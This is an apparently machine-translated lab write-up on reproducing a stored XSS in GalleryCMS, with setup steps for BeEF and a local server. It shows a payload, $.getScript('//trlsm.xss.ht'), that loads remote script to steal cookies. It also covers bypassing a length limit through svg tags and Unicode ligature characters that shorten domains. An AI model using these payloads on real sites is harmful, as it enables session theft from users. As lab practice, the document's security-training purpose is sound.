Duplicate gallerycms character length limit short domain name bypass

First, before starting to write the experiment , stay kali Go online and install beef-xss.

1. Enter... On the command line apt install beef-xss.

2. But he may make a mistake like this , So I tried to update , That is, input the command
apt-get update
apt-get upgrade

However , I'm still wrong when typing , His display result is like this .

3. I just Baidu the last one “Unmet dependencies. Try ‘apt --fix-broken install’ with no packages (or specify a solution)” Solutions for , Just install fix-broken.
apt --fix-broken install
But the article I'm looking for is still being updated , That is the first. 2 A content , Then I did it , Then I waited for him to download , Wait for him to download , Waiting for a long time , Then I also forgot whether I had to pause it or wait until it was over , Then I think it's possible to finish , There is no need to update that . Then I hit the installation command again ,
4. After successful installation , Just run it directly
beef-xss
In the middle of running, he will let you change your password , Just set it at will , He won't show .
And then it's over
5. Use browser access , Enter in the input box 192.168.121.135:3000/ui/panel That's all right. , Then you will be asked to enter your account number and password , If the configuration file is not modified , The default account number is beef, Then the password is the password you set the first time you run .

Set it up galleryCMS Server for .

1. First unzip the unzipped package to phpstudy_pro/WWW Below directory , Then find the file application/config/database.php file ,
Then modify the user name and password of the database in the file to make sure that the user name and password on your local machine are the same .

2. Start the small skin , Open the server and database , Then add a new website , And decompress just now GalleryCMS Put the path under the root directory , Then set the domain name to the file name . After these operations are done , restart Apache Service and MySQL.

3. Because I use kali Documents opened by the browser in , So first check in the local service IP Address ,
open CMD, Use ipconfig Order to see IP, Got IP It's just kali Enter in the browser , You can enter the page , But there are errors on this page .（ Because a meal is solved , Forget the screenshot , So there is no problem with the picture ）
4. According to the displayed error, it can be seen that it is the error of the server , So open MySQL, Create database gallaycms, Use table . Then go back to the browser , You can see that he has registered successfully , But there are still mistakes after entering , So there are still problems with this database . That is, the length of the inserted character segment is not enough , So we need to modify the character length .
Insert a command into the database ：alter table user modify last_ip varchar(100) not null default '127.0.0.1';
Then there is an order in the error report （insert At the beginning , I didn't remember the details ）, Copy and paste this command into MySQL In the order of , Then re-enter kali Browser , Re enter , We can enter .

Start reproducing the experiment

First, when creating a new album name , Let's export at will ,

F12 See here, he passed the value he just entered to a Inside the label

So take a look at the source document , It can be seen that it is direct output URL The address of , And I saw that after adding the album, I went add Method , And filter the spaces at both ends , It also defaults that you must fill in , And the default length is 45. And used xss-clean

xss-clean: Filter some symbols into some entities , And filter some keywords ,

Because when it comes to filtering a lot of tags , So first we will xss-clean Delete , Then create a name and fill it out ：< script > label .

When returning to the directory page, he will pop up , It is because it has been stored when it was created , So every time you enter , He is visiting .

Here we can use js Code .
So we want to get each other's cookie, Let's try to use >$.getScript(“//trlsm.xss.ht”),

But we can see from the picture that we use the shortest way to bypass , He is also too long bytes , So we just need to change the length of this ,

In the source code, the longest character length we specify is ：35
although xss-clean Filter a lot of tags , But he hasn't filtered it out < svg > label , So we use < svg> Label a test .


That is, you can find one svg The label of , To bypass .

But these necessary commands already exist 29 A character. , So we can only shorten the domain name .
But short domain name is the way to achieve , So here is a knowledge point ：

Use short characters to bypass character restrictions ： Such words, for example tel Normally 3 Bytes , But after writing like this ℡, He will use it as a byte . So this saves us as much character length as possible .

• ff expands to ff

• ℠ expands to sm
• ㏛ expands to sr
• st expands to st
• ㎭ expands to rad
• ℡ expands to tel

Then I tried to use the teacher's domain name , But because there are no documents , You can't modify the Internet ip For the native , Then do I have my own domain name , So I can only try to relax the character length limit ip To test . Can see beef There is .